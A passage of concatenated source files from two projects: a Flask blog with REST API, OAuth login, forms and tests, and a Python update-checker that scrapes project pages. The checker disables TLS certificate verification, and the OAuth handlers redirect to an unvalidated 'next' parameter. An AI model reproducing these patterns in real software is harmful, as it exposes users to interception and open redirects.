return jsonify({'message': 'No input data provided'}), 400
comment, errors = comment_schema.load(json_data)
if errors:
return jsonify(errors), 422
comment.author = g.current_user
comment.post = post
db.session.add(comment)
db.session.commit()
return comment_schema.jsonify(comment), 201, \
{'Location': url_for('api.get_comment', id=comment.id,
_external=True)}
```
#### File: app/api_1_0/main.py
```python
from flask import jsonify, url_for, request, send_file
from . import api
from .errors import bad_request
from .. import cache, qrcode
@api.route('/')
def main():
'''API列表'''
return jsonify({
'message': 'Hello, Fedora.',
'version': 'v1.0',
'apis': {
'token': url_for('.get_token', _external=True),
'users': url_for('.get_users', _external=True),
'posts': url_for('.get_posts', _external=True),
'comments': url_for('.get_comments', _external=True),
'chrome': url_for('.get_chrome', _external=True),
'qrcode': url_for('.get_qrcode', _external=True)}
})
@api.route('/qrcode', methods=['GET', 'POST'])
@cache.memoize(timeout=20)
def get_qrcode():
'''生成二维码'''
_request = request.args or request.json
if not hasattr(_request, 'get'):
return bad_request('value error')
url = _request.get('url', None) # 数据
version = _request.get('version', None) # 图片尺寸
correct = _request.get('correct', 'L') # 纠错级别
box_size = _request.get('box_size', 10) # 像素大小
border = _request.get('border', 1) # 边框大小
fcolor = _request.get('fcolor', 'black') # 前景色
bcolor = _request.get('bcolor', 'white') # 背景色
factor = _request.get('factor', 4) # 小图标是二维码的 1/4
icon = _request.get('icon', 'fedora.png') # 小图标
box = _request.get('box', None) # 小图标位置 "left, top"
box = box.split(',') if box else None
try:
if url is None:
raise ValueError('Need some value')
data = qrcode(url, mode='raw', version=version, error_correction=correct,
box_size=box_size, border=border, fill_color=fcolor,
back_color=bcolor, factor=factor, icon_img=icon, icon_box=box)
except:
return bad_request('value error')
return send_file(data, mimetype='image/png', cache_timeout=0)
```
#### File: app/api_1_0/posts.py
```python
from flask import jsonify, request, g, url_for
from .. import db, cache
from ..models import Post, Permission
from ..schemas import post_schema, posts_schema
from . import api
from .decorators import permission_required
from .errors import forbidden
from .utils import get_data
@api.route('/posts/')
@cache.memoize(timeout=600)
def get_posts():
'''获取文章列表'''
query = Post.query
items, prev, next, total = get_data(
query, posts_schema, 'api.get_posts')
return jsonify({
'self': items.data,
'prev': prev,
'next': next,
'count': total
})
@api.route('/posts/<int:id>')
@cache.memoize(timeout=600)
def get_post(id):
'''获取文章'''
post = Post.query.get_or_404(id)
return post_schema.jsonify(post)
@api.route('/posts/', methods=['POST'])
@permission_required(Permission.WRITE_ARTICLES)
def new_post():
'''创建新文章'''
json_data = request.get_json()
if not json_data:
return jsonify({'message': 'No input data provided'}), 400
post, errors = post_schema.load(json_data)
if errors:
return jsonify(errors), 422
post.author = g.current_user
db.session.add(post)
db.session.commit()
return post_schema.jsonify(post), 201, \
{'Location': url_for('api.get_post', id=post.id, _external=True)}
@api.route('/posts/<int:id>', methods=['PUT'])
@permission_required(Permission.WRITE_ARTICLES)
def edit_post(id):
'''编辑文章'''
post = Post.query.get_or_404(id)
if g.current_user != post.author and \
not g.current_user.can(Permission.ADMINISTER):
return forbidden('Insufficient permissions')
post.title = request.json.get('title', post.title)
post.body = request.json.get('body', post.body)
db.session.add(post)
return post_schema.jsonify(post)
```
#### File: app/auth/oauth.py
```python
from flask import request, jsonify, json, url_for, session, g, redirect, flash
from flask_login import login_user
from flask_babel import gettext as _
from . import auth
from .. import db, oauth, fas
from ..models import User, OAuth, OAuthType
github = oauth.remote_app('github', app_key='GITHUB') # GitHub OAuth2
google = oauth.remote_app('google', app_key='GOOGLE') # Google OAuth2
@auth.route('/login/oauth')
def oauth_login():
'''OAuth登陆'''
if request.args.get('op') == 'github':
return github.authorize(callback=url_for('.oauth_authorized',
next=request.args.get('next') or request.referrer or None,
op='github', _external=True))
if request.args.get('op') == 'google':
return google.authorize(callback=url_for('.oauth_authorized',
op='google', _external=True))
if request.args.get('op') == 'fedora':
return fas.login(return_url=url_for('.oauth_authorized',
next=request.args.get('next') or request.referrer or None,
op='fedora', _external=True),
cancel_url=url_for('.login'))
return jsonify({'error': 'Access denied'})
@auth.route('/login/oauth/authorized')
def oauth_authorized():
'''授权回调'''
op = request.args.get('op')
if op == 'fedora' and g.fas_user:
oauth = OAuth.query.filter_by(remote_uid=g.fas_user.username).first()
oauth_type = OAuthType.query.filter_by(name=op).first()
if oauth is None:
u = User(email=g.fas_user.email,
username=g.fas_user.username,
confirmed=True,
name=g.fas_user.fullname,
location=g.fas_user.timezone,
about_me='Welcome to use flasky.',
oauth=OAuth(type=oauth_type,
remote_uid=g.fas_user.username))
db.session.add(u)
login_user(u)
flash(_('Hello, %(username)s.', username=u.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if oauth:
login_user(oauth.local)
flash(_('Hello, %(username)s.', username=oauth.local.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if op == 'google':
resp = google.authorized_response()
if resp is None: # 验证失败
flash('Access denied: reason=%s error=%s' % (
request.args['error'],
request.args['error_description']
), 'danger')
return redirect(request.args.get('next') or url_for('.login'))
if resp.get('access_token'): # 防刷新
get = google.get('userinfo', token=(resp['access_token'], ''))
me = json.loads(get.raw_data)
oauth = OAuth.query.filter_by(remote_uid=me['id']).first()
oauth_type = OAuthType.query.filter_by(name=op).first()
if get.status == 200:
session['google_id'] = me['id']
if oauth is None: # 从未登陆, 创建新账户
u = User(email=me['email'],
username=me['given_name']+me['id'][-4:],
confirmed=True,
name=me['name'],
about_me='Welcome to use flasky.',
oauth=OAuth(type=oauth_type,
remote_uid=me['id'],
access_token=resp['access_token']))
db.session.add(u)
login_user(u)
flash(_('Hello, %(username)s.', username=u.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if oauth: # 再次授权, 更新token
oauth.access_token = resp['access_token']
login_user(oauth.local)
flash(_('Hello, %(username)s.', username=oauth.local.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if op == 'github':
resp = github.authorized_response()
if resp is None: # 验证失败
flash('Access denied: reason=%s error=%s' % (
request.args['error'],
request.args['error_description']
), 'danger')
return redirect(request.args.get('next') or url_for('.login'))
if resp.get('access_token'): # 防刷新
get = github.get('user', token=(resp['access_token'], ''))
me = json.loads(get.raw_data)
oauth = OAuth.query.filter_by(remote_uid=me['id']).first()
oauth_type = OAuthType.query.filter_by(name=op).first()
if get.status == 200:
session['github_id'] = me['id']
if oauth is None: # 从未登陆, 创建新账户
email_addr = <EMAIL>' % (me['login'], me['id'])
u = User(email=me['email'] if me['email'] else email_addr,
username=me['login'],
confirmed=True,
name=me['name'] if me['name'] else me['login'],
location=me['location'],
about_me='Welcome to use flasky.',
oauth=OAuth(type=oauth_type,
remote_uid=me['id'],
access_token=resp['access_token']))
db.session.add(u)
login_user(u)
flash(_('Hello, %(username)s.', username=u.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if oauth: # 再次授权, 更新token
oauth.access_token = resp['access_token']
login_user(oauth.local)
flash(_('Hello, %(username)s.', username=oauth.local.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
flash(_('Access denied.'), 'danger')
return redirect(request.args.get('next') or url_for('.login'))
@github.tokengetter
def get_github_oauth_token(token=None):
'''读取第三方应用返回的 token'''
uid = session.get('github_id')
oauth = OAuth.query.filter_by(remote_uid=uid).first()
return (oauth.access_token, '')
@google.tokengetter
def get_google_oauth_token():
'''读取 Google token'''
uid = session.get('google_id')
oauth = OAuth.query.filter_by(remote_uid=uid).first()
return (oauth.access_token, '')
```
#### File: app/main/forms.py
```python
from flask_wtf import FlaskForm as Form
from wtforms import StringField, TextAreaField, BooleanField, SelectField, SubmitField
from wtforms.validators import Required, Length, Email, Regexp
from wtforms import ValidationError
from flask_pagedown.fields import PageDownField
from flask_babel import lazy_gettext as _ # 直到渲染表单时, 才惰性翻译文本
from ..models import User, Role, Category
class NameForm(Form):
'''姓名表单'''
name = StringField(_('What is your name?'), validators=[Required()])
submit = SubmitField(_('Submit'))
class EditProfileForm(Form):
'''编辑用户信息表单'''
name = StringField(_('Real name'), validators=[Length(0, 64)])
location = StringField(_('Location'), validators=[Length(0, 64)])
about_me = TextAreaField(_('About me'))
submit = SubmitField(_('Submit'))
class EditProfileAdminForm(Form):
'''管理员编辑用户信息表单'''
email = StringField(_('Email'), validators=[Required(), Length(1, 64), Email()])
username = StringField(_('Username'), validators=[
Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
_('Usernames must have only letters, '
'numbers, dots or underscores'))])
confirmed = BooleanField(_('Confirmed'))
role = SelectField(_('Role'), coerce=int)
name = StringField(_('Real name'), validators=[Length(0, 64)])
location = StringField(_('Location'), validators=[Length(0, 64)])
about_me = TextAreaField(_('About me'))
submit = SubmitField(_('Submit'))
def __init__(self, user, *args, **kwargs):
super(EditProfileAdminForm, self).__init__(*args, **kwargs)
self.user = user
# 在 choices 属性设置 select 控件各选项, 格式: [(选项标识符, 显示文本), ...]
self.role.choices = [(role.id, role.name)
for role in Role.query.order_by(Role.name).all()]
def validate_email(self, field):
'''验证邮箱'''
if field.data != self.user.email and \
User.query.filter_by(email=field.data).first():
raise ValidationError(_('Email already registered.'))
def validate_username(self, field):
'''验证用户名'''
if field.data != self.user.username and \
User.query.filter_by(username=field.data).first():
raise ValidationError(_('Username already in use.'))
class PostForm(Form):
'''文章表单'''
title = StringField(_('Title'), validators=[Required()])
tag = StringField(_('Tags'))
category = SelectField(_('Categories'), coerce=int)
body = PageDownField(_("What's on your mind?"), validators=[Required()])
submit = SubmitField(_('Submit'))
def __init__(self, *args, **kwargs):
super(PostForm, self).__init__(*args, **kwargs)
# 在 choices 属性设置 select 控件各选项, 格式: [(选项标识符, 显示文本), ...]
self.category.choices = [(cate.id, cate.name)
for cate in Category.query.order_by(Category.name).all()]
class CommentForm(Form):
'''评论表单'''
body = TextAreaField(_('Enter your comment'), validators=[Required()])
submit = SubmitField(_('Submit'))
class SearchForm(Form):
'''搜索表单'''
search = StringField('Search', validators=[Required(), Length(0, 64)])
```
#### File: flasky/app/schemas.py
```python
from marshmallow import pre_load, ValidationError
from .models import (Role, User, Post, Comment, Tag, Category, BlogView, OAuth,
OAuthType, Chrome, Package, Release)
from . import ma
USER_SCHEMA_ONLY = ('username', 'email', 'url', 'posts_url')
POST_SCHEMA_ONLY = ('title', 'timestamp', 'category', 'tags',
'url', 'author_url', 'comments_url')
COMMENT_SCHEMA_ONLY = ('body', 'timestamp', 'url', 'author_url', 'post_url')
class UserSchema(ma.ModelSchema):
'''User 模型规则'''
url = ma.Hyperlinks(ma.URLFor('api.get_user', id='<id>', _external=True), dump_only=True)
posts_url = ma.Hyperlinks(ma.URLFor('api.get_user_posts', id='<id>', _external=True), dump_only=True)
favorite_posts_url = ma.Hyperlinks(ma.URLFor('api.get_user_favorite_posts', id='<id>', _external=True), dump_only=True)
followed_posts_url = ma.Hyperlinks(ma.URLFor('api.get_user_followed_posts', id='<id>', _external=True), dump_only=True)
followers_url = ma.Hyperlinks(ma.URLFor('api.get_user_followers', id='<id>', _external=True), dump_only=True)
following_url = ma.Hyperlinks(ma.URLFor('api.get_user_following', id='<id>', _external=True), dump_only=True)
email = ma.String(required=True)
username = ma.String(required=True)
password = ma.String(required=True, load_only=True)
class Meta:
model = User
fields = ('username', 'password', 'email', 'confirmed', 'posts_url', 'followed_posts_url',
'name', 'location', 'about_me', 'member_since', 'last_seen',
'favorite_posts_url', 'followers_url', 'following_url', 'url')
@pre_load
def make_user(self, data):
user = User.query.filter_by(email=data['email']).first()
if user:
raise ValidationError('User already exists')
class PostSchema(ma.ModelSchema):
'''Post 模型规则'''
url = ma.Hyperlinks(ma.URLFor('api.get_post', id='<id>', _external=True), dump_only=True)
author_url = ma.Hyperlinks(ma.URLFor('api.get_user', id='<author_id>', _external=True), dump_only=True)
comments_url = ma.Hyperlinks(ma.URLFor('api.get_post_comments', id='<id>', _external=True), dump_only=True)
category = ma.Nested('CategorySchema', only='name')
tags = ma.Nested('TagSchema')
title = ma.String(required=True)
body = ma.String(required=True)
class Meta:
model = Post
fields = ('title', 'body', 'body_html', 'timestamp', 'category', 'tags',
'url', 'author_url', 'comments_url')
@pre_load
def make_post(self, data):
if not data.get('title'):
raise ValidationError('Post does not have a title')
if not data.get('body'):
raise ValidationError('Post does not have a body')
class CommentSchema(ma.ModelSchema):
'''Comment 模型规则'''
url = ma.Hyperlinks(ma.URLFor('api.get_comment', id='<id>', _external=True), dump_only=True)
author_url = ma.Hyperlinks(ma.URLFor('api.get_user', id='<author_id>', _external=True), dump_only=True)
post_url = ma.Hyperlinks(ma.URLFor('api.get_post', id='<post_id>', _external=True), dump_only=True)
body = ma.String(required=True)
class Meta:
model = Comment
fields = ('body', 'body_html', 'timestamp',
'url', 'author_url', 'post_url')
@pre_load
def make_comment(self, data):
if not data.get('body'):
raise ValidationError('Comment does not have a body')
class CategorySchema(ma.ModelSchema):
'''Category 模型规则'''
class Meta:
model = Category
class TagSchema(ma.ModelSchema):
'''Tag 模型规则'''
class Meta:
model = Tag
user_schema = UserSchema()
users_schema = UserSchema(many=True, only=USER_SCHEMA_ONLY)
post_schema = PostSchema()
posts_schema = PostSchema(many=True, only=POST_SCHEMA_ONLY)
comment_schema = CommentSchema()
comments_schema = CommentSchema(many=True, only=COMMENT_SCHEMA_ONLY)
# class BlogViewSchema(ma.ModelSchema):
# class Meta:
# model = BlogView
# class OAuthSchema(ma.ModelSchema):
# class Meta:
# model = OAuth
# class OAuthTypeSchema(ma.ModelSchema):
# class Meta:
# model = OAuthType
# class ChromeSchema(ma.ModelSchema):
# class Meta:
# model = Chrome
# class PackageSchema(ma.ModelSchema):
# class Meta:
# model = Package
# class ReleaseSchema(ma.ModelSchema):
# class Meta:
# model = Release
```
#### File: 1dot75cm/flasky/daemons.py
```python
from __future__ import print_function
import os
import time
import daemon
import lockfile
import manage
from app import create_app, db
from config import logdir
os.environ['IS_DAEMON'] = '1'
if not os.path.exists(logdir):
os.makedirs(logdir)
context = daemon.DaemonContext(
umask=0o002,
working_directory=os.getcwd(),
stdout=open(os.path.join(logdir, "STDOUT"), 'a+'),
stderr=open(os.path.join(logdir, "STDERR"), 'a+'),
pidfile=lockfile.FileLock(os.path.join(logdir, "daemon.pid")))
def echo(data):
now = time.strftime('[%y/%m/%d %H:%M:%S] ', time.localtime())
print(now + data)
if __name__ == '__main__':
print('Run daemon.')
with context:
app = create_app('default')
ctx = app.app_context()
ctx.push()
while True:
echo('Run task.')
manage.check_karma()
db.session.commit()
manage.create_repo()
echo('Task finish.')
time.sleep(app.config['INTERVAL'])
ctx.pop()
```
#### File: flasky/tests/test_client.py
```python
import re
from flask import url_for
from flask_testing import TestCase
from app import create_app, db
from app.models import User, Role
class FlaskClientTestCase(TestCase):
def create_app(self):
'''创建 app'''
return create_app('testing')
def setUp(self):
'''在每个测试前运行, 初始化测试环境'''
db.create_all()
Role.insert_roles()
def tearDown(self):
'''在每个测试后运行, 清理测试环境'''
db.session.remove()
db.drop_all()
def test_home_page(self):
'''测试主页'''
response = self.client.get(url_for('main.index'))
self.assertTrue(b'Copyright' in response.data)
def test_register_and_login(self):
'''测试新用户注册, 确认账户, 登录功能'''
# register a new account
response = self.client.post(url_for('auth.register'), data={
'email': '<EMAIL>',
'username': 'john',
'password': '<PASSWORD>',
'password2': '<PASSWORD>'
})
self.assertTrue(response.status_code == 302) # 注册成功, 返回重定向
# login with the new account
response = self.client.post(url_for('auth.login'), data={
'email': '<EMAIL>',
'password': '<PASSWORD>'
}, follow_redirects=True) # 自动重定向, 返回 GET 请求的响应
self.assertTrue(re.search(b'Hello,\s+john!', response.data))
self.assertTrue(
b'You have not confirmed your account yet' in response.data)
# send a confirmation token
user = User.query.filter_by(email='<EMAIL>').first()
token = user.generate_confirmation_token() # 还可以通过解析邮件获取 token
response = self.client.get(url_for('auth.confirm', token=token),
follow_redirects=True)
self.assertTrue(b'You have confirmed your account' in response.data)
# log out
response = self.client.get(url_for('auth.logout'),
follow_redirects=True)
self.assertTrue(b'You have been logged out' in response.data)
``` |
{
"source": "1dot75cm/repo-checker",
"score": 2
} |
#### File: 1dot75cm/repo-checker/checker3.py
```python
from threading import Thread
from queue import Queue
import urllib.request, urllib.parse, urllib.error
import re, csv, json
import time, sys, os
import argparse, random
import gzip, ssl
from io import BytesIO
import asyncio, aiohttp
import tqdm, signal
class GzipHandler(urllib.request.BaseHandler):
''' A handler to add gzip capabilities to urllib requests '''
def http_request(self, req):
req.add_header('Accept-Encoding', 'gzip')
return req
def http_response(self, req, resp):
old_resp = resp # resp.headers
data = resp.read() # 内存中的数据,只能读一次
try:
content = gzip.GzipFile(fileobj = BytesIO(data), mode = 'r').read()
except OSError:
content = data
fp = BytesIO(content) # File-like-obj具有read()方法
resp = urllib.request.addinfourl(fp, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
return resp
https_request = http_request
https_response = http_response
class Checker(object):
''' check update for software '''
def __init__(self, *args):
self.sub_pkg, self.url_type, self.name, self.url = args[:4]
self.branch, self.rpm_com, self.rpm_date = args[4:7]
self.release_date = self.release_com = ""
self.latest_date = self.latest_com = ""
self.status = ""
self.ualist = [
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; rv:41.0) Gecko/20100101 Firefox/41.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/40.0',
'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'
]
def get_page(self, _url):
''' 获取整个页面数据
return str '''
header = { 'Accept-Encoding': 'gzip' }
header['User-Agent'] = self.ualist[random.randint(0, len(self.ualist)-1)]
if opts['user_agent']: header['User-Agent'] = opts['user_agent']
req = urllib.request.Request(url = _url, headers = header)
pros = opts['proxy']
if pros and pros[0] in ('http', 'https'):
req.set_proxy(pros[1], pros[0])
# urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed
# https://www.python.org/dev/peps/pep-0476/
context = ssl._create_unverified_context()
page = urllib.request.urlopen(req, timeout=80, context=context).read()
#gzip_handler = GzipHandler()
#proxy_handler = urllib.request.ProxyHandler({'https':'XX.XX.XX.XX:XXXX'})
#proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
#proxy_auth_handler.add_password('realm', 'host', 'username', 'password')
#opener = urllib.request.build_opener(gzip_handler, proxy_handler, proxy_auth_handler)
#opener.addheaders = [('User-Agent', 'Python-urllib/2.7')]
#urllib.request.install_opener(opener)
#page = opener.open(_url).read()
try:
if self.url_type == "2": return "None Content"
if self.url_type == "4": return gzip.decompress(page).decode('gb2312').encode('utf-8')
else: return gzip.decompress(page)
except OSError:
return page
def get_date(self, _page):
''' 获取 date -> 150708
return short_time(str) '''
time_format = "%Y-%m-%d"
pattern = b'.*datetime="(.*?)T'
if self.url_type in ["4", "6", "14"]:
pattern = b'([0-9]{4}-[0-9]{1,2}-[0-9]{1,2})'
elif self.url_type == "5":
_page = _page.split(b"tragtor")[4]
pattern = b'time.>(.*[0-9]{4})'
time_format = "%a %b %d %H:%M:%S %Y"
elif self.url_type == "7":
if _page.splitlines()[-3].find(b"info") > -1:
_page = _page.splitlines()[-4]
else:
_page = _page.splitlines()[-3]
pattern = b'([0-9]{2}-.{3}-[0-9]{4})'
time_format = "%d-%b-%Y"
elif self.url_type == "8":
pattern = b'tag.*([0-9]{4}-[0-9]{1,2}-[0-9]{1,2})'
elif self.url_type == "9":
pattern = b'id=\w{40}.*([0-9]{4}-[0-9]{2}-[0-9]{2})'
elif self.url_type == "10":
pattern = b'([0-9]{2}\s.{3}\s[0-9]{4})'
time_format = "%d %b %Y"
elif self.url_type == "11":
pattern = b'([A-Z].*\s[0-9]{1,2},\s[0-9]{4})'
time_format = "%B %d, %Y"
elif self.url_type == "12":
pattern = b'id=\w{40}.*tag-deco.*([0-9]{4}-[0-9]{2}-[0-9]{2})'
elif self.url_type == "20":
pattern = b'([0-9]{2}-.{3}-[0-9]{4})'
time_format = "%d-%b-%Y"
elif self.url_type == "21":
_page = json.loads(_page.decode())['PCC'][0]['date'].encode()
pattern = b'(.*)'
elif self.url_type == "22":
_page = re.findall(b'.*364.*', _page)[-1]
pattern = b'([0-9]{2}-\w{3}-[0-9]{4})'
time_format = "%d-%b-%Y"
try:
d = re.search(pattern, _page, re.M).group(1).decode()
t = time.strptime(d, time_format)
return time.strftime("%y%m%d", t)
except (AttributeError, TypeError):
return "None"
def get_commit(self, _page):
''' 获取 commit
return commit(str) '''
pattern = b'.*commit/([a-z0-9]*)\"'
if self.url_type == "9":
pattern = b'id=(\w{40})'
elif self.url_type == "12":
pattern = b'id=(\w{40}).*tag-deco'
try:
return re.search(pattern, _page, re.M).group(1).decode()
except (AttributeError, TypeError):
return "None"
def get_info(self):
''' 获取页面commit和date
return datalist'''
type_num = ["3", "4", "5", "6", "7", "9", "10", "11", "12", "14", "20", "21", "22"]
if self.url_type in type_num:
release_url = self.url.replace('%2',',')
p1 = self.get_page(release_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.release_date, self.release_com
elif self.url_type != "2":
release_url = self.url + "/releases"
latest_url = self.url + "/commits/" + self.branch
p1, p2 = self.get_page(release_url), self.get_page(latest_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.get_date(p2), self.get_commit(p2)
if self.rpm_date == self.latest_date or self.rpm_date >= self.release_date:
self.status = "normal"
else:
self.status = "update" + "[" + self.url + "]"
def output(self):
''' Output.
Sub Package: 0. normal 1. subpkg '''
name = "- " + self.name if self.sub_pkg == "1" else self.name
rpm_ver = self.rpm_date + "[" + self.rpm_com[:7] + "]"
rel_ver = self.release_date + "[" + self.release_com[:7] + "]"
lat_ver = self.latest_date + "[" + self.latest_com[:7] + "]"
print(str(name).ljust(22) + \
str(rpm_ver).ljust(16) + \
str(rel_ver).ljust(16) + \
str(lat_ver).ljust(16) + \
str(self.status))
class CheckerAIO(Checker):
@asyncio.coroutine
def get_page(self, _url):
''' 获取整个页面数据
return str '''
header = { 'Accept-Encoding': 'gzip' }
header['User-Agent'] = self.ualist[random.randint(0, len(self.ualist)-1)]
if opts['user_agent']: header['User-Agent'] = opts['user_agent']
with (yield from semaphore):
response = yield from aiohttp.request('GET', _url, headers = header)
page = yield from response.read()
try:
if self.url_type == "2": return "None Content"
if self.url_type == "4": return gzip.decompress(page).decode('gb2312').encode('utf-8')
else: return gzip.decompress(page)
except OSError:
return page
@asyncio.coroutine
def get_info(self):
''' 获取页面commit和date
return datalist'''
type_num = ["3", "4", "5", "6", "7", "9", "10", "11", "12", "14", "20", "21", "22"]
if self.url_type in type_num:
release_url = self.url.replace('%2',',')
p1 = yield from self.get_page(release_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.release_date, self.release_com
elif self.url_type != "2":
release_url = self.url + "/releases"
latest_url = self.url + "/commits/" + self.branch
p1 = yield from self.get_page(release_url)
p2 = yield from self.get_page(latest_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.get_date(p2), self.get_commit(p2)
if self.rpm_date == self.latest_date or self.rpm_date >= self.release_date:
self.status = "normal"
else:
self.status = "update" + "[" + self.url + "]"
class Helper(object):
def __init__(self):
global opts
opts = {
'thread_num': 10,
'input_file': 'checker_data.csv',
'user_agent': None,
'proxy' : None,
'mode' : 'aio'
}
self.helper()
self.q = Queue()
self.localtime(1)
def inputs(self):
''' Load csv file.
CSV Format:
"1,1,lwqq,https://github.com/xiehuc/lwqq,master,733836e,150202"
Sub Package: 0. normal 1. subpkg
Url Type: 1. github 2. google 3. bitbucket 4. sogou 5. tragtor 6. youdao
7. opera 8. pacman 9. apt 10. nginx 11. ccal 12. sandbox 14. wps
20. qt-installer-freamwork 21. pycharm
Name, Url, Branch, RPM Commit, RPM Update Time, Others
return list '''
csvlist = []
with open(opts['input_file'], 'r') as csvfile:
content = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in content:
if len(row) != 0 and row[0][0] != "#":
csvlist.append(row)
return csvlist
def output(self, title=None):
''' Output. '''
if title == 1:
print("# Generation date:", self.localtime(0)[0], \
"\n Name".ljust(23) + \
"RPM-Version".ljust(16) + \
"Rel-Version".ljust(16) + \
"Latest-Commit".ljust(16) + \
"Status")
else:
print("Bye~ %s Working: %s Sec" % self.localtime(0))
def localtime(self, trigger=1):
''' return current localtime and seconds. '''
global start_sec, stop_sec
local_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
if trigger == 1:
start_sec = time.time()
elif trigger == 0:
stop_sec = time.time()
return (local_time, stop_sec - start_sec)
def helper(self):
''' display help information.
return csv_path, thread_num'''
doclist = []
for i in __doc__.splitlines():
if i.startswith("@") and i.find(": ") > -1:
doclist.append(i.split(': ')[1])
_author, _email, _project, _github, _description, _version = doclist
parser = argparse.ArgumentParser(description=_description)
parser.add_argument('-n', '--number', metavar='NUM', type=int,
dest='numbers', action='store',
help='{_name} work number of thread(default: 10)'.format(
_name=_project.lower()))
parser.add_argument('-f', '--file', metavar='PATH',
dest='files', action='store',
help='{_name} data file(csv) full path'.format(
_name=_project.lower()))
parser.add_argument('-U', '--user-agent', metavar='AGENT', type=str,
dest='user_agent', action='store',
help='user identify as AGENT(default: random)')
parser.add_argument('-x', '--proxy', metavar='PROTOCOL://HOST:PORT', type=str,
dest='proxy', action='store',
help='use proxy on given port')
parser.add_argument('-m', '--mode', dest='mode', action='store',
choices={'thread','aio'}, default='aio',
help='multi-tasking mode(default: aio)')
parser.add_argument('-v', '--version', dest='version', action='store_true',
help='output version information and exit')
args = parser.parse_args()
if args.version:
print('{} version {}\nWritten by {} <{}>\nReport bug: <{}>'.format(
_project, _version, _author, _email, _github))
sys.exit()
if args.files and os.path.exists(args.files):
opts['input_file'] = args.files
elif args.files is not None:
print("{}: cannot access '{}': No such file or directory"
.format(_project, args.files))
sys.exit()
if args.numbers:
opts['thread_num'] = args.numbers
if args.user_agent:
opts['user_agent'] = args.user_agent
if args.proxy:
opts['proxy'] = re.split('://', args.proxy)
if args.mode:
opts['mode'] = args.mode
def working(self):
''' get content from queue. '''
while True:
obj = self.q.get()
obj.get_info()
self.q.task_done()
def running(self, *args):
''' Mutilthreads test: 1, 569s; 5, 107s; 10, 54s; 15, 37s
create threads, and put data to queue. '''
for i in range(opts['thread_num']):
t = Thread(target=self.working, args=())
t.setDaemon(True)
t.start()
for item in args:
self.q.put(item)
self.q.join()
@asyncio.coroutine
def progress(self, coros):
for obj in tqdm.tqdm(asyncio.as_completed(coros), total=len(coros)):
yield from obj
def interrupt(self):
for task in asyncio.Task.all_tasks():
task.cancel()
if __name__ == "__main__":
tools = Helper()
objlist = []
for i in tools.inputs():
if opts['mode'] == 'aio':
objlist.append(CheckerAIO(*i))
else:
objlist.append(Checker(*i))
try:
if opts['mode'] == 'thread':
tools.running(*objlist)
else:
global semaphore
semaphore = asyncio.Semaphore(opts['thread_num'])
loop = asyncio.get_event_loop()
loop.add_signal_handler(signal.SIGINT, tools.interrupt) # 捕捉信号
tasks = [i.get_info() for i in objlist]
loop.run_until_complete(tools.progress(tasks))
except (KeyboardInterrupt, asyncio.CancelledError, urllib.error.URLError):
pass
tools.output(1)
for obj in objlist:
obj.output()
tools.output()
```
#### File: checker/backends/arch_cgit.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class Arch_cgitBackend(BaseBackend):
"""for projects hosted on archlinux.org"""
name = 'Arch CGit'
domain = 'git.archlinux.org'
example = 'https://git.archlinux.org/pacman.git'
def __init__(self, url):
super(Arch_cgitBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return [self._url, self._url + '/log/']
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("substring(//div[@class='content']//tr[@class='nohover'][3]/following::*/td[4]/span/@title, 1, 19)", ""),
("substring(//tr[2]/td[1]/span/@title, 1, 19)",
"//tr[2]/td[2]/a/@href")]
@classmethod
def isrelease(cls, url):
if cls.domain in url and 'log' in url:
return False
else:
return True
```
#### File: checker/backends/cpan.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class CpanBackend(BaseBackend):
"""for projects hosted on cpan.org"""
name = 'CPAN'
domain = 'cpan.org'
example = 'http://search.cpan.org/dist/perl'
def __init__(self, url):
super(CpanBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return [self._url]
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("//div[3]//tr[1]/td[4]/small/text()", ""), ("", "")]
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/jetbrains.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class JetbrainsBackend(BaseBackend):
"""for projects hosted on jetbrains.com"""
name = 'JetBrains'
domain = 'www.jetbrains.com'
